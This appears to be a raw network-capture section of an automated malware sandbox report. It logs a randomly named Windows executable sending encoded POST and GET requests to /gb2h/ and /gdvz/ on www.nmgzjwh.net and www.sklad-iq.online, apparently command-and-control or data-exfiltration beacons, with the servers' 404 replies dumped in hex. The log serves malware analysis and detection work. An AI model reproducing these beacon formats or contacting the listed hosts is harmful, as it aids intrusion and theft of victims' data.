                                                                                          CF-RAY: 8e77a62bfc4741cd-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2393&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=478&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 35 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                          Data Ascii: 57d<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-siz
                                                                                          Nov 24, 2024 08:22:39.734920025 CET1001INData Raw: 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a
                                                                                          Data Ascii: e:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          41192.168.2.550017172.67.168.228802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:45.313941002 CET717OUTPOST /gb2h/ HTTP/1.1
                                                                                          Host: www.nmgzjwh.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.nmgzjwh.net
                                                                                          Referer: http://www.nmgzjwh.net/gb2h/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 4a 43 36 53 33 72 39 63 30 66 53 50 41 70 6b 54 70 45 35 6e 6d 54 4f 74 52 4c 51 36 6c 6e 79 67 70 7a 36 39 43 68 70 42 41 70 65 63 6f 75 4e 6a 59 54 31 69 41 53 73 55 4a 57 4b 67 36 6e 4d 2b 77 62 36 75 67 30 36 45 48 57 45 6f 58 30 41 39 77 7a 4e 30 54 62 59 35 73 52 34 62 6e 77 53 44 65 45 47 57 53 31 2b 53 46 44 4d 63 6f 64 6e 4a 6d 2b 42 59 61 75 43 47 46 39 30 34 55 46 4e 59 66 53 4d 4d 77 55 57 46 68 67 37 6a 52 36 55 46 42 4c 74 49 4c 43 2f 50 67 38 4c 6c 55 59 6c 4e 6f 76 54 53 4b 37 47 58 7a 66 63 43 6b 75 62 57 33 67 65 64 68 72 66 4f 77 6b 57 65 53 44 48 52 6f 43 6f 43 6b 71 4d 3d
                                                                                          Data Ascii: 8z=JC6S3r9c0fSPApkTpE5nmTOtRLQ6lnygpz69ChpBApecouNjYT1iASsUJWKg6nM+wb6ug06EHWEoX0A9wzN0TbY5sR4bnwSDeEGWS1+SFDMcodnJm+BYauCGF904UFNYfSMMwUWFhg7jR6UFBLtILC/Pg8LlUYlNovTSK7GXzfcCkubW3gedhrfOwkWeSDHRoCoCkqM=
                                                                                          Nov 24, 2024 08:22:46.898960114 CET889INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:46 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oiIxfgFWAwX3ZP%2Fny6yOkgCNB2rlO6IOkkuDY%2FWx6KqbuvsoweO%2BmGQyk5sHLptlMeumM48tz04SQyZYsTePMBYFvtX6pWp5jRfYbRgsVbnSM7SwYR4ZKR12nN7v%2FEj3pU4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a656edcfc338-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1458&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=717&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 70 d9 24 e5 a7 54 da 71 d9 24 a7 e6 95 a4 16 d9 d9 64 18 a2 ab cf 30 b4 b3 d1 87 4a 73 d9 64 14 d9 c1 d4 e6 a5 67 e6 55 20 49 e9 43 8d d2 07 bb 01 00 ad 72 6b 8d 8a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 6d(HML),I310Q/Qp/Kp$Tq$d0JsdgU ICrk0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          42192.168.2.550018172.67.168.228802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:47.976769924 CET737OUTPOST /gb2h/ HTTP/1.1
                                                                                          Host: www.nmgzjwh.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.nmgzjwh.net
                                                                                          Referer: http://www.nmgzjwh.net/gb2h/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 4a 43 36 53 33 72 39 63 30 66 53 50 44 49 30 54 36 33 68 6e 68 7a 4f 75 65 72 51 36 76 48 79 38 70 7a 47 39 43 6a 45 5a 41 37 71 63 6f 4e 5a 6a 62 57 5a 69 42 53 73 55 64 47 4b 70 2b 6e 4d 31 77 62 32 49 67 31 47 45 48 57 51 6f 58 30 77 39 78 41 6c 37 51 72 59 37 6b 78 34 64 36 41 53 44 65 45 47 57 53 31 71 34 46 44 55 63 6f 4e 58 4a 67 72 31 62 62 75 43 5a 54 74 30 34 51 46 4e 55 66 53 4d 71 77 57 69 76 68 6d 33 6a 52 34 38 46 42 61 74 4a 41 43 2f 7a 75 63 4c 77 45 4e 49 49 73 4d 54 45 48 4b 6d 54 72 75 59 4c 73 34 71 38 74 43 57 31 79 4c 7a 32 67 33 65 70 44 7a 6d 34 79 68 34 79 36 39 61 42 6d 75 54 36 63 63 34 54 44 62 4a 46 78 6d 70 59 38 75 61 37
                                                                                          Data Ascii: 8z=JC6S3r9c0fSPDI0T63hnhzOuerQ6vHy8pzG9CjEZA7qcoNZjbWZiBSsUdGKp+nM1wb2Ig1GEHWQoX0w9xAl7QrY7kx4d6ASDeEGWS1q4FDUcoNXJgr1bbuCZTt04QFNUfSMqwWivhm3jR48FBatJAC/zucLwENIIsMTEHKmTruYLs4q8tCW1yLz2g3epDzm4yh4y69aBmuT6cc4TDbJFxmpY8ua7
                                                                                          Nov 24, 2024 08:22:49.593923092 CET889INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:49 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2BspKrhslZnvbJLaC9693y03YuXnmMnzuPJ1OUa4vMa%2FBJw7a%2FO58PMCNRpnVk055CeTUgOvC4IB9uUh6E6MXBjxCGTOnMIl7ffbnqUc3EJm5tkrr3%2F9IAA5dcvllGwA5yw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a667cae243b2-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2236&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 70 d9 24 e5 a7 54 da 71 d9 24 a7 e6 95 a4 16 d9 d9 64 18 a2 ab cf 30 b4 b3 d1 87 4a 73 d9 64 14 d9 c1 d4 e6 a5 67 e6 55 20 49 e9 43 8d d2 07 bb 01 00 ad 72 6b 8d 8a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 6d(HML),I310Q/Qp/Kp$Tq$d0JsdgU ICrk0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          43192.168.2.550019172.67.168.228802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:50.642451048 CET1754OUTPOST /gb2h/ HTTP/1.1
                                                                                          Host: www.nmgzjwh.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.nmgzjwh.net
                                                                                          Referer: http://www.nmgzjwh.net/gb2h/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 4a 43 36 53 33 72 39 63 30 66 53 50 44 49 30 54 36 33 68 6e 68 7a 4f 75 65 72 51 36 76 48 79 38 70 7a 47 39 43 6a 45 5a 41 37 79 63 6f 39 46 6a 64 42 4e 69 43 53 73 55 42 32 4b 6b 2b 6e 4d 53 77 59 47 4d 67 31 4c 7a 48 55 6f 6f 56 57 34 39 32 78 6c 37 48 37 59 37 6f 52 34 63 6e 77 54 42 65 45 57 53 53 31 36 34 46 44 55 63 6f 50 50 4a 32 4f 42 62 5a 75 43 47 46 39 30 6b 55 46 4d 39 66 53 55 55 77 57 6d 56 68 57 58 6a 52 59 4d 46 43 73 42 4a 4e 43 2f 78 70 63 4b 31 45 4e 4d 44 73 4d 50 49 48 4b 44 2b 72 70 55 4c 39 65 58 66 39 77 69 52 77 4e 58 6e 7a 41 6e 4e 44 6c 2b 2b 78 78 67 36 35 2f 2b 77 6b 74 76 46 56 4b 51 77 57 72 4d 61 79 67 5a 30 30 71 79 76 4e 2f 69 37 47 75 78 68 70 37 68 71 37 6a 7a 69 48 47 31 67 58 55 39 76 61 72 42 53 32 4b 59 54 66 6b 64 6b 30 37 32 33 44 7a 6b 32 75 2b 7a 36 68 4a 79 44 46 34 69 6e 6c 2f 31 6e 52 38 31 42 62 56 68 57 56 44 37 71 4e 32 2b 6c 48 39 35 52 32 76 7a 73 44 77 7a 46 4d 33 69 4f 5a 51 47 4c 44 48 79 56 35 77 35 50 59 69 4a 76 37 51 77 41 63 66 42 [TRUNCATED]
                                                                                          Data Ascii: 8z=JC6S3r9c0fSPDI0T63hnhzOuerQ6vHy8pzG9CjEZA7yco9FjdBNiCSsUB2Kk+nMSwYGMg1LzHUooVW492xl7H7Y7oR4cnwTBeEWSS164FDUcoPPJ2OBbZuCGF90kUFM9fSUUwWmVhWXjRYMFCsBJNC/xpcK1ENMDsMPIHKD+rpUL9eXf9wiRwNXnzAnNDl++xxg65/+wktvFVKQwWrMaygZ00qyvN/i7Guxhp7hq7jziHG1gXU9varBS2KYTfkdk0723Dzk2u+z6hJyDF4inl/1nR81BbVhWVD7qN2+lH95R2vzsDwzFM3iOZQGLDHyV5w5PYiJv7QwAcfBns1qdRQr6KUNDcL+LM95NO9gNR1oONnXRvf7i9+xFvbIkIMiRAUFMxL0xK8fSkKAigC/Ri+16TCsNJtgSM3pu1ZLbtu8aPpSI77e9+icBM2xqprTYbJck+9m+4i6/yY/Yun7xhF7Jg4Ldub6h/kDv2iiu8sADgadSwVJNfT1xI2F5ZBWMvEgVhJmIXjWIY8akKfSCvZ2jLKLRcAnfQ8TKd2HS0FEX6I2rgvFdqiwv+q4jWmQW7T8L669J2avFGzRjPweF1+seWbHKrEaqS4rMVdeyuQFRE8SpiPv42yptv9FW8NS+MkfMyWegTgdywDyxF9mdjCnqZC8WmOWp5rJ3hCnZeUPZm4EtczBx4uJYpWxhtw/ot7iVKqMmlgyS/ozHrKeG1vHW+zzNL2hyudTkbI0/CueVl/8AlRU1NCEwDNM7GKvFdc3asDeOUGlm0cJpUh0FdtVV9MZQmXrYm2XqYK/tqvX6/HX0FpU4IwxkYLIfPqc+GOED8kzxbuejx0CYDTFgT1bSk1+ntpUsm1YwrypQ4yAtFm8+rsCD29EV5jocqABvNb4tKK258l1NYEzCMEaAmrzplsAWKtX1lwzeGjgVWSFPJx+yLpO8NHBnhFK4pBsAJn7Iee4ynz5OzaPthQBdw/u39g5SoTsjpJNJECThfL3HkOdro [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          44192.168.2.550020172.67.168.228802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:53.293205976 CET471OUTGET /gb2h/?8z=EASy0dFQ3+mIcpYg1BhqvEqrUNk9skL9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXIr49oxoJg0asAGStZmb1Pixrpd6NwrYyT6qlasg7QhQxcA==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.nmgzjwh.net
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:22:54.924420118 CET890INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:54 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjuuwbQWjW%2BOROeAWS0JYmJA8HgYGxlrySVbvOzI%2FuFj7peIu1U1LlBO6fAaEhQyxmCUxA866Yl2Wdmvbmpb5qq8vV5Sngfl6FVY26khjkVILYdOy7ETYl6cttQ92R9QV9c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a6890b221921-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1424&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=471&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          45192.168.2.550021194.58.112.174802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:23:00.417012930 CET729OUTPOST /gdvz/ HTTP/1.1
                                                                                          Host: www.sklad-iq.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.sklad-iq.online
                                                                                          Referer: http://www.sklad-iq.online/gdvz/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 31 30 41 6a 54 74 36 33 45 69 66 42 7a 65 39 51 45 4f 4c 2f 38 45 50 70 36 49 59 6e 66 6e 6c 59 5a 6a 77 71 64 6a 79 75 34 70 4f 4c 31 67 6b 36 43 70 72 32 63 73 38 38 74 31 51 59 59 77 6e 4a 77 6c 78 48 76 45 5a 49 51 59 35 63 53 67 71 77 4d 66 43 35 5a 44 74 6e 75 34 69 70 41 6f 72 48 68 30 4b 64 70 72 4d 4c 42 34 4f 6b 6b 35 31 4a 62 79 41 78 39 6f 6c 71 34 6a 6b 67 6d 49 33 75 6f 31 6f 43 4f 79 6a 2b 4c 62 79 74 2b 71 37 70 59 58 57 68 43 78 2f 73 75 76 42 6c 6b 49 34 72 44 6c 48 78 50 42 48 78 56 63 47 62 69 59 57 64 75 2f 77 59 45 5a 6f 35 4c 38 51 42 34 45 43 49 76 37 35 2b 35 6d 73 3d
                                                                                          Data Ascii: 8z=10AjTt63EifBze9QEOL/8EPp6IYnfnlYZjwqdjyu4pOL1gk6Cpr2cs88t1QYYwnJwlxHvEZIQY5cSgqwMfC5ZDtnu4ipAorHh0KdprMLB4Okk51JbyAx9olq4jkgmI3uo1oCOyj+Lbyt+q7pYXWhCx/suvBlkI4rDlHxPBHxVcGbiYWdu/wYEZo5L8QB4ECIv75+5ms=
                                                                                          Nov 24, 2024 08:23:01.801975965 CET1236INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:23:01 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b [TRUNCATED]
                                                                                          Data Ascii: d1bZko_1fQRERMS(.P4mHI#F}CvQ].)R~)*@9;s{gf{-`C&eUqP:\Zh\A{'$gG{~i3sO*!F?0;)hlD9s0da'v[Kpm:DHG=Lx|hiGM|HJ,B`Opa$J7e`qf"P+M\02cuyz]zmuj`b-X-mXM+cX*}/bi^(`GvRNr3E"S8t4\Aok:NV`;:3Jd,Gut$rEK svW5@JR\D7Q(9Hd?%|>Qr7wnn4:l6P0`Y=A(|@-"y4t#(WL?Jo6-nZXGt@7&CQA,VvRnYlmdgX6fzhOh#RUnN9sUwR~.a@?|QG9Y6!-{;WE|_/F.y/u\"50pbk{Z4n`H'-ZoHKaSV_w)O^N/S{2%uks,\ecJ0c/W|l,;L~Q'3;`&GgMIt)KF*)RjC' "1yhW)"*B<(/&UaZ3;8 ,""6b [TRUNCATED]
                                                                                          Nov 24, 2024 08:23:01.801986933 CET224INData Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                          Data Ascii: 6%vuW#(Ovp)Ey'3%aecW'wMC~{{VPK'i>3<5.;Hox:s+p|@XazP6Io^`,dPH?|XXC5d__z3LtCKx120x`j?sB~
                                                                                          Nov 24, 2024 08:23:01.830919027 CET1236INData Raw: 1d 24 0f a0 db 21 16 82 45 a4 b7 19 55 37 59 03 ea 1d 15 98 d9 03 ca 9d b4 e0 03 fc 7f 40 6b cc 93 2a 2c 90 7e a6 ac a0 62 19 56 4a be 87 59 d0 f7 a7 5f ef bf 30 37 79 43 81 f1 a4 d5 fe 29 fd 32 73 eb 3d e5 cd 6c 99 8a 84 0e 92 47 28 e8 a0 f0 77
                                                                                          Data Ascii: $!EU7Y@k*,~bVJY_07yC)2s=lG(w],R?Pj8R(NYAK"{#h.]u`6x#l$Mg=^T&qOH_dhWt.r5a3;HGf^0A^{Q0Qc^
                                                                                          Nov 24, 2024 08:23:01.830929995 CET845INData Raw: 73 f2 4b be 2f 7d 24 cf 64 c1 52 72 af 1d e1 78 48 bc e9 0a 72 76 ad aa 3b 54 4b ee a5 61 74 26 07 a5 4b c3 70 87 92 8d 89 5f 9f 5e e2 83 77 70 2b 5a ab 52 bf 6a 7d fb a5 9d 99 86 5a a0 89 9b 37 0c af e6 db da 2c 68 8a 4c a5 62 d8 82 d0 8e 3e 8c
                                                                                          Data Ascii: sK/}$dRrxHrv;TKat&Kp_^wp+ZRj}Z7,hLb>7+#5+oWV5\]\Dtx)O*T%M{oQrsiTZ]rD^5=.aYW|4g UO?*pOL}!(s0dqo;*s*psVu|\](Gio


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          46192.168.2.550022194.58.112.174802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:23:03.084314108 CET749OUTPOST /gdvz/ HTTP/1.1
                                                                                          Host: www.sklad-iq.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.sklad-iq.online
                                                                                          Referer: http://www.sklad-iq.online/gdvz/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 31 30 41 6a 54 74 36 33 45 69 66 42 31 50 4e 51 42 70 66 2f 36 6b 50 32 77 6f 59 6e 4b 58 6c 63 5a 6a 38 71 64 6d 53 41 35 61 36 4c 31 46 59 36 44 6f 72 32 66 73 38 38 6e 56 51 58 46 41 6e 53 77 6c 74 6c 76 46 6c 49 51 59 39 63 53 68 61 77 51 38 36 34 59 54 74 6c 37 49 69 72 50 49 72 48 68 30 4b 64 70 72 70 51 42 35 71 6b 6c 4a 6c 4a 61 57 55 79 30 49 6c 74 2f 6a 6b 67 77 49 33 69 6f 31 6f 77 4f 7a 50 59 4c 5a 36 74 2b 76 48 70 59 46 75 69 4e 78 2f 71 6a 50 41 52 6e 62 56 6c 4e 33 58 45 54 6a 43 71 56 66 4f 6a 6a 75 6e 33 30 64 34 77 58 35 45 42 62 76 59 32 70 30 6a 68 31 59 70 4f 6e 78 37 4d 4f 62 61 76 75 78 44 44 51 48 54 71 7a 6c 52 74 6c 4c 4a 68
                                                                                          Data Ascii: 8z=10AjTt63EifB1PNQBpf/6kP2woYnKXlcZj8qdmSA5a6L1FY6Dor2fs88nVQXFAnSwltlvFlIQY9cShawQ864YTtl7IirPIrHh0KdprpQB5qklJlJaWUy0Ilt/jkgwI3io1owOzPYLZ6t+vHpYFuiNx/qjPARnbVlN3XETjCqVfOjjun30d4wX5EBbvY2p0jh1YpOnx7MObavuxDDQHTqzlRtlLJh
                                                                                          Nov 24, 2024 08:23:04.439945936 CET1236INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:23:04 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Content-Encoding: gzip
